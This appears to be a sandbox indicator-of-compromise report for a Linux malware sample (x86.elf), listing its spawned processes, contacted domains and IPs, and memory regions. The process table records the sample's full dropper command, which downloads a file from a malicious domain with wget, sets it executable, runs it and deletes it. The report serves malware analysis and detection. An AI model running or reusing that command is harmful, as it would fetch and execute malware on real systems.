IOC Report
x86.elf

loading gif

Processes

Path
Cmdline
Malicious
/tmp/x86.elf
/tmp/x86.elf
/tmp/x86.elf
-
/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
/bin/sh
-
/usr/bin/wget
wget -q http://gay.energy/.../vivid -O .....
/bin/sh
-
/usr/bin/chmod
chmod 777 .....
/bin/sh
-
/bin/sh
/bin/sh ./.....
/bin/sh
-
/usr/bin/rm
rm -rf .....
/tmp/x86.elf
-
/tmp/x86.elf
-
/tmp/x86.elf
-
There are 4 hidden processes, click here to show them.

Domains

Name
IP
Malicious
gay.energy
unknown
malicious
daisy.ubuntu.com
162.213.35.25

IPs

IP
Domain
Country
Malicious
92.60.77.69
unknown
Italy
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
416000
page execute read
malicious
416000
page execute read
malicious
416000
page execute read
malicious
13e7000
page read and write
13e7000
page read and write
7fff4d1ed000
page execute read
520000
page read and write
51a000
page read and write
7fff4d163000
page read and write
13e7000
page read and write
51a000
page read and write
520000
page read and write
51a000
page read and write
7fff4d1ed000
page execute read
520000
page read and write
7fff4d163000
page read and write
7fff4d163000
page read and write
7fff4d1ed000
page execute read
There are 8 hidden memdumps, click here to show them.